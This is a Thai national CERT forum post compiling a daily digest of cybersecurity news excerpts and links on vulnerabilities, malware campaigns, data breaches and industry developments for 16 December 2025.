NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 16 December 2025

    Cyber Security News
    1
    1
    39
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      New Tooling

      • Prometheus: Open-Source Metrics And Monitoring Systems And Services
        "Prometheus is an open-source monitoring and alerting system built for environments where services change often and failures can spread fast. For security teams and DevOps engineers, it has become a common way to track system behavior, spot early warning signs, and understand what is happening across large sets of workloads."
        https://www.helpnetsecurity.com/2025/12/15/prometheus-open-source-metrics-monitoring-systems-services/
        https://github.com/prometheus/prometheus

      Vulnerabilities

      • Atlassian Patches Critical Apache Tika Flaw
        "Atlassian has rolled out patches for roughly 30 third-party vulnerabilities impacting its products, including critical-severity flaws. The first security defect that stands out is CVE-2025-66516 (CVSS score of 10/10), a critical-severity XML External Entity (XXE) injection bug in Apache Tika. Impacting the tika-core, tika-pdf-module, and tika-parsers modules of the universal parser, the flaw was disclosed in early December. It can be exploited via crafted XFA files placed inside PDF files, potentially leading to information leaks, denial-of-service (DoS), SSRF attacks, or remote code execution (RCE)."
        https://www.securityweek.com/atlassian-patches-critical-apache-tika-flaw/
        https://securityaffairs.com/185710/security/atlassian-fixed-maximum-severity-flaw-cve-2025-66516-in-apache-tika.html
      • FreePBX Patches Critical SQLi, File-Upload, And AUTHTYPE Bypass Flaws Enabling RCE
        "Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025, are listed below -"
        https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html
      • CISA Adds Two Known Exploited Vulnerabilities To Catalog
        "CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2025-14611 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
        CVE-2025-43529 Apple Multiple Products Use-After-Free WebKit Vulnerability"
        https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
        https://securityaffairs.com/185716/hacking/u-s-cisa-adds-apple-and-gladinet-centrestack-and-triofox-flaws-to-its-known-exploited-vulnerabilities-catalog.html

      Malware

      • Frogblight Threatens You With a Court Case: a New Android Banker Targets Turkish Users
        "In August 2025, we discovered a campaign targeting individuals in Turkey with a new Android banking Trojan we dubbed “Frogblight”. Initially, the malware was disguised as an app for accessing court case files via an official government webpage. Later, more universal disguises appeared, such as the Chrome browser. Frogblight can use official government websites as an intermediary step to steal banking credentials. Moreover, it has spyware functionality, such as capabilities to collect SMS messages, a list of installed apps on the device and device filesystem information. It can also send arbitrary SMS messages."
        https://securelist.com/frogblight-banker/118440/
      • Threats Behind The Mask Of Gentlemen Ransomware
        "Gentlemen is a new ransomware group first identified around August 2025. The group operates a double extortion model that involves breaching corporate networks, exfiltrating data, encrypting the data, and then using the encrypted data to extort victims. During the breach, the group employs typical tactics seen in advanced ransomware groups, such as Group Policy Objects (GPO) manipulation and Bring Your Own Vulnerable Driver (BYOVD). As of now, there is no clear evidence that the group is operating on a Ransomware as a Service (RaaS) model. Additionally, it is yet to be confirmed whether the group is a rebranding of an existing ransomware group or a sub-group."
        https://asec.ahnlab.com/en/91545/
      • SantaStealer Is Coming To Town: A New, Ambitious Infostealer Advertised On Underground Forums
        "Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP."
        https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
        https://www.bleepingcomputer.com/news/security/new-santastealer-malware-steals-data-from-browsers-crypto-wallets/
      • Askul Confirms Theft Of 740k Customer Records In Ransomware Attack
        "Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. Askul is a large business-to-business and business-to-consumer office supplies and logistics e-commerce company owned by Yahoo! Japan Corporation. The ransomware incident in October caused an IT system failure, forcing the company to suspend shipments to customers, including the retail giant Muji."
        https://www.bleepingcomputer.com/news/security/askul-confirms-theft-of-740k-customer-records-in-ransomhouse-attack/
      • Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
        "On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups. GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress."
        https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
        https://www.bleepingcomputer.com/news/security/google-links-more-chinese-hacking-groups-to-react2shell-attacks/
        https://www.bankinfosecurity.com/nation-state-cybercrime-exploits-tied-to-react2shell-a-30285
        https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/
        https://www.theregister.com/2025/12/15/react2shell_flaw_china_iran/
      • GitHub Scanner For React2Shell (CVE-2025-55182) Turns Out To Be Malware
        "A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports. Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware."
        https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/
      • Operation MoneyMount-ISO — Deploying Phantom Stealer Via ISO-Mounted Executables
        "At Seqrite Labs, we continuously monitor global cyber threat activity. During ongoing threat monitoring, the Seqrite Labs Researcher Team identified an active phishing campaign originating from Russia. This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain. The attack initiates with a social engineering email masquerading as a legitimate financial correspondence, claiming to confirm a payment transaction. The email contains a malicious ZIP archive, which, when opened, triggers the execution of the payload."
        https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
        https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
        https://www.infosecurity-magazine.com/news/russian-phishing-phantom-stealer/
      • 8 Million Users' AI Conversations Sold For Profit By "Privacy" Extensions
        "A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude and started thinking out loud-laying out the options, weighing the tradeoffs, asking for perspective. Midway through the conversation, I paused. I realized how much I'd shared: not just this decision, but months of conversations-personal dilemmas, health questions, financial details, work frustrations, things I hadn't told anyone else. I'd developed a level of candor with my AI assistant that I don't have with most people in my life. And then an uncomfortable thought: what if someone was reading all of this?"
        https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection
        https://thehackernews.com/2025/12/featured-chrome-browser-extension.html
      • Amazon Threat Intelligence Identifies Russian Cyber Threat Group Targeting Western Critical Infrastructure
        "As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure."
        https://aws.amazon.com/blogs/security/amazon-threat-intelligence-identifies-russian-cyber-threat-group-targeting-western-critical-infrastructure/
        https://www.theregister.com/2025/12/15/amazon_ongoing_gru_campaign/
      • GOLD SALEM Tradecraft For Deploying Warlock Ransomware
        "In mid-August 2025, Counter Threat Unit™ (CTU) researchers identified the use of the legitimate Velociraptor digital forensics and incident response (DFIR) tool in likely ransomware precursor activity. Subsequent investigation and analysis of events in customer environments led CTU™ researchers to assess with high confidence that these incidents occurred with intent to deploy Warlock ransomware, which is operated by the GOLD SALEM cybercrime group."
        https://news.sophos.com/en-us/2025/12/11/gold-salem-tradecraft-for-deploying-warlock-ransomware/

      Breaches/Hacks/Leaks

      • PornHub Extorted After Hackers Steal Premium Member Activity Data
        "Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. Last week, PornHub disclosed that it was impacted by a recent breach at analytics vendor Mixpanel. Mixpanel suffered a breach on November 8th, 2025, after an SMS phishing (smishing) attack enabled threat actors to compromise its systems. "A recent cybersecurity incident involving Mixpanel, a third-party data analytics provider, has impacted some Pornhub Premium users," reads a PornHub security notice posted on Friday."
        https://www.bleepingcomputer.com/news/security/pornhub-extorted-after-hackers-steal-premium-member-activity-data/
      • 700Credit Data Breach Impacts 5.8 Million Vehicle Dealership Customers
        "700Credit, a U.S.-based financial services and fintech company, will start notifying more than 5.8 million people that their personal information has been exposed in a data breach incident. The cyberattack occurred after a threat actor had breached one of 700Credit's integration partners in July and discovered an API for obtaining customer information. However, the partner did not inform 700Credit of the compromise."
        https://www.bleepingcomputer.com/news/security/700credit-data-breach-impacts-58-million-vehicle-dealership-customers/
        https://therecord.media/data-breaches-affecting-20-million-prosper-700credit
        https://www.securityweek.com/700credit-data-breach-impacts-5-8-million-individuals/
        https://securityaffairs.com/185692/data-breach/u-s-fintech-and-data-services-firm-700credit-suffered-a-data-breach-impacting-at-least-5-6-million-people.html
      • Youth Sports, NCAA Insurance Claims Potentially Hacked
        "A Maine-based third-party administrator that handles healthcare claims involving day care centers, youth sports and NCAA athlete accidents is notifying more than 181,000 claimants that their medical information and personal identifiers may have been accessed or stolen in an April hacking incident. National Accident Health General Agency, or NAHGA, describes itself as a third-party administrator that focuses on secondary accident insurance claims processing for clients across the country."
        https://www.bankinfosecurity.com/youth-sports-ncaa-insurance-claims-potentially-hacked-a-30292
      • Jaguar Land Rover Confirms Staff Data Stolen In Cyberattack
        "British car manufacturer Jaguar Land Rover (JLR) has confirmed data belonging to current and former employees was compromised in a cyberattack that struck in August. The announcement is the first time the company has provided any details about the attack, which halted production for more than a month, ultimately leaving JLR short of more than $890 million."
        https://therecord.media/jaguar-land-rover-confirms-staff-data-stolen-cyberattack
        https://www.theregister.com/2025/12/15/jlr_payroll_data_stolen_in/
      • SoundCloud Confirms Breach After Member Data Stolen, VPN Access Disrupted
        "Audio streaming platform SoundCloud has confirmed that outages and VPN connection issues over the past few days were caused by a security breach in which threat actors stole a database containing user information. The disclosure follows widespread reports over the past four days from users who were unable to access SoundCloud when connecting via VPN, with attempts resulting in the site displaying 403 "forbidden" errors. In a statement shared with BleepingComputer, SoundCloud said it recently detected unauthorized activity involving an ancillary service dashboard and activated its incident response procedures."
        https://www.bleepingcomputer.com/news/security/soundcloud-confirms-breach-after-member-data-stolen-vpn-access-disrupted/

      General News

      • Europe’s DMA Raises New Security Worries For Mobile Ecosystems
        "Mobile security has long depended on tight control over how apps and services interact with a device. A new paper from the Center for Cybersecurity Policy and Law warns that this control may weaken as the European Union’s Digital Markets Act pushes mobile platforms to open core functions to outside developers. The report explains that the DMA requires large platform providers to support free interoperability with mobile hardware and software features that sit deep in the operating system. These internal functions were never designed for open access. This single requirement introduces a set of risks that grow as more system components are exposed."
        https://www.helpnetsecurity.com/2025/12/15/eu-dma-mobile-security-risks/
        https://cdn.prod.website-files.com/660ab0cd271a25abeb800460/692f22683cc0c02728db52bb_Europe_DMA_All_120325.pdf
      • How Researchers Are Teaching AI Agents To Ask For Permission The Right Way
        "People are starting to hand more decisions to AI agents, from booking trips to sorting digital files. The idea sounds simple. Tell the agent what you want, then let it work through the steps. The hard part is what the agent does with personal data along the way. A new research study digs into this problem, and asks a basic question. How should an AI agent know when to use someone’s data without asking every time?"
        https://www.helpnetsecurity.com/2025/12/15/research-ai-agent-permissions/
        https://arxiv.org/pdf/2511.17959
      • From Fake Deals To Phishing: The Most Effective Christmas Scams Of 2025
        "As the season of giving unfolds, cyber criminals are taking advantage of holiday stress and speed. In 2025, scams are not only more common, they’re powered by AI and automation, making them harder to spot. Researchers at Check Point detected 33,502 Christmas-themed phishing emails in the past two weeks alone, along with more than 10,000 fake advertisements being created daily on social media channels. Many mimic festive promotions, while others push fake Walmart or Home Depot deals, fraudulent charity appeals, and urgent delivery notices."
        https://blog.checkpoint.com/research/from-fake-deals-to-phishing-the-most-effective-christmas-scams-of-2025/
      • Think Like An Attacker: Cybersecurity Tips From Cato Networks' CISO
        "Welcome to Dark Reading's Heard it From a CISO video series, which offers advice on breaking into and advancing within the cybersecurity field from those who have been there. Cybersecurity is a field that touches every aspect of modern life, from personal privacy to global business operations. In Dark Reading's latest episode, Etay Mayor, chief security strategist at Cato Networks and professor at Boston College, shares his journey, expertise, and advice for those interested in entering this ever-evolving domain."
        https://www.darkreading.com/cybersecurity-operations/cybersecurity-tips-cato-networks-ciso
      • The 2025 Cloudflare Radar Year In Review: The Rise Of AI, Post-Quantum, And Record-Breaking DDoS Attacks
        "The 2025 Cloudflare Radar Year in Review is here: our sixth annual review of the Internet trends and patterns we observed throughout the year, based on Cloudflare’s expansive network view. Our view is unique, due to Cloudflare’s global network, which has a presence in 330 cities in over 125 countries/regions, handling over 81 million HTTP requests per second on average, with more than 129 million HTTP requests per second at peak on behalf of millions of customer Web properties, in addition to responding to approximately 67 million (authoritative + resolver) DNS queries per second."
        https://blog.cloudflare.com/radar-2025-year-in-review/
        https://www.helpnetsecurity.com/2025/12/15/cloudflare-internet-trends-2025/
      • Militant Groups Are Experimenting With AI, And The Risks Are Expected To Grow
        "As the rest of the world rushes to harness the power of artificial intelligence, militant groups also are experimenting with the technology, even if they aren’t sure exactly what to do with it. For extremist organizations, AI could be a powerful tool for recruiting new members, churning out realistic deepfake images and refining their cyberattacks, national security experts and spy agencies have warned. Someone posting on a pro-Islamic State group website last month urged other IS supporters to make AI part of their operations. “One of the best things about AI is how easy it is to use,” the user wrote in English."
        https://www.securityweek.com/militant-groups-are-experimenting-with-ai-and-the-risks-are-expected-to-grow/
      • Analyzing Partially Encrypted Network Flows With Mid-Encryption
        "Encrypted traffic has come to dominate network flows, which makes it difficult for traditional flow monitoring tools to maintain visibility. This is particularly true when the process to enable encryption occurs after an initial data exchange, causing the encryption attributes to be missed. In this blog post we take a closer look at a new feature added to CERT’s Yet Another Flowmeter tool (YAF) to capture the attributes of encryption when it occurs after the start of the session. We call this mid-encryption. We explore what mid-encryption means, why it matters, how it works within YAF, and what benefits this brings to traffic analysis and network security teams."
        https://www.sei.cmu.edu/blog/analyzing-partially-encrypted-network-flows-with-mid-encryption/
      • The 2025 ITRC Consumer Impact Report: A New Era Of Identity Crime
        "Founded in 1999, the Identity Theft Resource Center (ITRC) is a national nonprofit dedicated to empowering and guiding consumers, victims, businesses and government agencies to minimize risk and mitigate the impact of identity compromise and crime. The ITRC provides free victim assistance and consumer education through its website, live chat and toll-free phone support. It also tracks data breaches and offers resources for both individuals and businesses to stay informed and protected, including an annual report on the previous year’s trends in identity theft and data breaches. The 2025 ITRC Consumer Impact Report was published recently, and its tone is markedly more urgent than previous years’ reports."
        https://blog.barracuda.com/2025/12/15/2025-irtc-consumer-impact-report-new-era-identity-crime
        https://www.idtheftcenter.org/publication/itrc-2025-consumer-impact-report/
      • Third DraftKings Hacker Pleads Guilty
        "Nathan Austad is the third individual to plead guilty to launching a credential stuffing attack against a fantasy sports and betting website, the DoJ announced. Austad, 21, of Farmington, Minnesota, also known as ‘Snoopy’, admitted in court to his role in a scheme to hack thousands of user accounts and sell access to them to drain their funds. According to documents and statements presented in court, Austad and his co-conspirators compromised over 60,000 user accounts at the betting website."
        https://www.securityweek.com/third-draftkings-hacker-pleads-guilty/
      • CERT-FR Recommends Completely Deactivate Wi-Fi Whenever It’s Not In Use
        "The CERT-FR (French Computer Emergency Response Team) is advising iPhone and Android users to fully disable Wi-Fi to reduce risk. CERT-FR warns iPhone and Android users to fully disable Wi-Fi to reduce exposure, citing multiple vulnerabilities across wireless interfaces, apps, OSs, and even hardware. The agency reiterates basic hygiene: install apps only from official stores, review permissions, keep devices updated and rebooted, use a VPN on public Wi-Fi, and disable auto-join on open networks."
        https://securityaffairs.com/185702/hacking/cert-fr-recommends-completely-deactivate-wi-fi-whenever-its-not-in-use.html
      • The Budget Effect Of a Security Incident
        "As sophisticated cyber-attacks increasingly target SaaS data, both vendors and customers are pushing to increase investments in SaaS security. Vendors are dedicating substantial resources to product development, incident communication and customer outreach. Simultaneously, many customers are elevating SaaS security conversations to their CISOs and Information Security (InfoSec) teams. Others are still considering their options and their risk appetites."
        https://www.infosecurity-magazine.com/blogs/the-budget-effect-of-a-security/

      อ้างอิง
      Electronic Transactions Development Agency (ETDA) f6c96880-3ae4-4f66-bc4d-1a0084dad433-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post